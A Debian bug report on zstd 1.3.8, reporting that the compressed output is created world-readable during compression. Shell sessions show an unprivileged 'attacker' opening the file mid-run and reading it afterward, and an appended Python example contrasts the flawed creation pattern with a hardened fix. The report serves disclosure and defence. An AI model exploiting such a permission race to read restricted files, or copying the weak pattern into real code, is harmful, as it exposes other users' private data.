Package: zstd
Version: 1.3.8+dfsg-3
Severity: critical

When compressing a large file with restricted access permissions, a new,
world-readable file is created, revealing the contents of the uncompressed
file.

Sample:

# whoami
root
# zstd -q -13 -T8 sample.dmp &> zstd.log &
:
:
# ls -al
total 385983012
drwxr-xr-x  2 root   root           4096 Jan 30 16:01 .
drwxr-xr-x 35 root   root           4096 Jan 30 15:39 ..
-rw-------  1 oracle users  279265214464 Jan 29 22:02 sample.dmp
-rw-r--r--  1 root   root   115981336576 Jan 30 16:25 sample.dmp.zst
-rw-r--r--  1 root   root              0 Jan 30 16:01 zstd.log
:
:
[1]+  Done                    zstd -q -13 -T8 sample.dmp &> zstd.log
# md5sum sample.dmp.zst
5a3d3401e8e46483659e820f96ad0ef0  sample.dmp.zst

An attacker might be able to open(2) the file while zstd is still running,
wait for zstd to complete its job, and then read(2) the whole file:

% whoami
attacker
% ls -al
total 465071584
drwxr-xr-x  2 root   root           4096 Jan 30 16:01 .
drwxr-xr-x 35 root   root           4096 Jan 30 15:39 ..
-rw-------  1 oracle users  279265214464 Jan 29 22:02 sample.dmp
-rw-r--r--  1 root   root   196968022016 Jan 30 16:41 sample.dmp.zst
-rw-r--r--  1 root   root              0 Jan 30 16:01 zstd.log
% md5sum sample.dmp.zst
^Z
[1]+  Stopped                 md5sum sample.dmp.zst
:
:
% ls -al
total 475580484
drwxr-xr-x  2 root   root           4096 Jan 30 16:01 .
drwxr-xr-x 35 root   root           4096 Jan 30 15:39 ..
-rw-------  1 oracle users  279265214464 Jan 29 22:02 sample.dmp
-rw-------  1 oracle users  207729131801 Jan 29 22:02 sample.dmp.zst
-rw-r--r--  1 root   root              0 Jan 30 16:01 zstd.log
% fg
md5sum sample.dmp.zst
5a3d3401e8e46483659e820f96ad0ef0  sample.dmp.zst
%

In this sample session the attacker got the correct md5sum, just for
demonstration purposes. He could have created his own private copy in the
same way.

This makes zstd unusable for me.

Regards
Harri
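The sessions above show the output file being created with the process's umask-filtered default mode (0644) long before its contents are complete, and only being tightened to the source's mode and owner at the very end. The following is an added example, not zstd's own code: it contrasts that creation pattern with one that creates the output owner-only from the first byte (independent of the umask) and widens it to the source file's mode only after the last byte is written. zlib stands in for the zstd codec, and the file names, function names and sample payload are constructed for the demonstration.

```python
import os
import stat
import tempfile
import zlib

# Added example, not zstd's code. zlib stands in for the zstd codec; the
# point is how the output file is created, not which codec fills it.

CHUNK = 1 << 16


def _pump(fin, fout):
    """Stream fin through a zlib compressor into fout."""
    comp = zlib.compressobj()
    for chunk in iter(lambda: fin.read(CHUNK), b""):
        fout.write(comp.compress(chunk))
    fout.write(comp.flush())


def compress_default_mode(src, dst):
    """Weak pattern: create the output with mode 0666 filtered by umask.
    Under the usual umask 022 this yields 0644, world-readable, even when
    src is 0600, and it stays readable for the whole compression run."""
    with open(src, "rb") as fin, open(dst, "xb") as fout:  # "x" = O_EXCL
        _pump(fin, fout)


def compress_preserving_mode(src, dst):
    """Hardened pattern: create the output owner-only, write it, and copy
    the source's mode onto it only once it is complete. The umask can only
    clear bits, so 0o600 never becomes world-readable on any umask."""
    src_mode = stat.S_IMODE(os.stat(src).st_mode)
    with open(src, "rb") as fin:
        fd = os.open(dst, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        try:
            with os.fdopen(fd, "wb") as fout:  # fdopen now owns fd
                _pump(fin, fout)
                fout.flush()
                # Widen to the source's permissions only after all data
                # has been written, so no reader ever sees a partial file
                # they were not entitled to read.
                os.fchmod(fout.fileno(), src_mode)
        except BaseException:
            os.unlink(dst)  # never leave a half-written output behind
            raise


def demo_modes(umask=0o022):
    """Constructed demonstration: a 0600 source compressed under the given
    umask. Returns (mode from the weak pattern, mode from the hardened
    pattern, round-trip ok) so the two creation patterns can be compared."""
    old = os.umask(umask)
    try:
        with tempfile.TemporaryDirectory() as d:
            payload = b"constructed secret payload line\n" * 1000
            src = os.path.join(d, "sample.dmp")
            with open(src, "wb") as f:
                f.write(payload)
            os.chmod(src, 0o600)
            weak = os.path.join(d, "weak.z")
            safe = os.path.join(d, "safe.z")
            compress_default_mode(src, weak)
            compress_preserving_mode(src, safe)
            with open(safe, "rb") as f:
                ok = zlib.decompress(f.read()) == payload
            return (stat.S_IMODE(os.stat(weak).st_mode),
                    stat.S_IMODE(os.stat(safe).st_mode),
                    ok)
    finally:
        os.umask(old)


if __name__ == "__main__":
    weak, safe, ok = demo_modes()
    print("default open(): %04o   hardened: %04o   round-trip: %s"
          % (weak, safe, ok))
```

Note that the hardened variant still has a window if the source is later changed, but the window the bug report describes (an unprivileged reader opening the output while it is being written) is closed, because the file is never world-readable before it is complete.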